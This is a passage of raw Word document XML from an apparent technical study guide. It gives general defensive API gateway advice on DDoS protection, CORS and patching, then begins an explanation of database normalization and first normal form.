          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. DDoS Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75838294"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Protect the API gateway from Distributed Denial of Service (DDoS) attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51355E87"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lastRenderedPageBreak/>
        <w:t>Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07783724" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement rate limiting to mitigate the impact of DDoS attacks by controlling request rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8083E" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Traffic Filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use web application firewalls (WAFs) or cloud-based DDoS protection services to filter and block malicious traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590F3C9"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E547E0" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Deploy a WAF in front of the API gateway to filter out malicious requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B033EC1" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DDoS Mitigation Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Utilize cloud services like AWS Shield or Azure DDoS Protection to detect and mitigate large-scale attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B5EE8" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. CORS (Cross-Origin Resource Sharing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4E098"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Control which domains are allowed to access resources on the API gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8F9CB"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C39AAB" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CORS Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure CORS policies to specify which origins, methods, and headers are allowed in cross-origin requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39115542"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69009539" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CORS Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set up CORS headers (e.g., Access-Control-Allow-Origin) to define permitted origins and request types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56699A26" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9. API Gateway Security Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4B99F8"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Implement general security best practices to ensure the overall security of the API gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E83BA"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F05F19" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Least Privilege Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Apply the principle of least privilege to limit access and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D048B" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Security Audits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722426C1" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Patch Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Keep the API gateway software and dependencies up-to-date with the latest security patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEFA748" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F16805" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access Control Lists (ACLs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Define ACLs to restrict access to administrative functions and sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63307330" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Patches</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly update the API gateway and related software to address known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9E6C3B" w14:textId="77777777" w:rsidR="0018537F" w:rsidRPr="00DA2F32" w:rsidRDefault="0018537F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055A8E4D" w14:textId="73B24999" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2331DE" w14:textId="277D38A5" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc178383300"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Database </w:t>
      </w:r>
      <w:r w:rsidR="00BB2F17" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF4D696" w14:textId="224DFD93" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc178383301"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the concept of normalization in relational databases.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="1FFDBE3C"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Normalization in relational databases is a design process used to organize data efficiently and reduce redundancy. The main goal of normalization is to ensure that the database is structured in a way that minimizes duplication of data and maintains data integrity. This is achieved by dividing the database into related tables and defining relationships between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477B865"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Key Objectives of Normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9E829" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Minimize Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Eliminate duplicate data to reduce storage requirements and avoid inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C5532" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Maintain the accuracy and consistency of data across the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD3302" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improve Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Optimize the database design to make queries more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAB761"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Normalization Levels (Normal Forms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6059F46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Normalization involves applying a series of "normal forms," each with specific requirements. The most commonly used normal forms are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76021065"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1. First Normal Form (1NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BF1FF"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Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table is in 1NF if all its columns contain atomic (indivisible) values and each column contains values of a single type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBF8E7E"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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CA3CDB" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eliminate repeating groups and arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8D8988" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
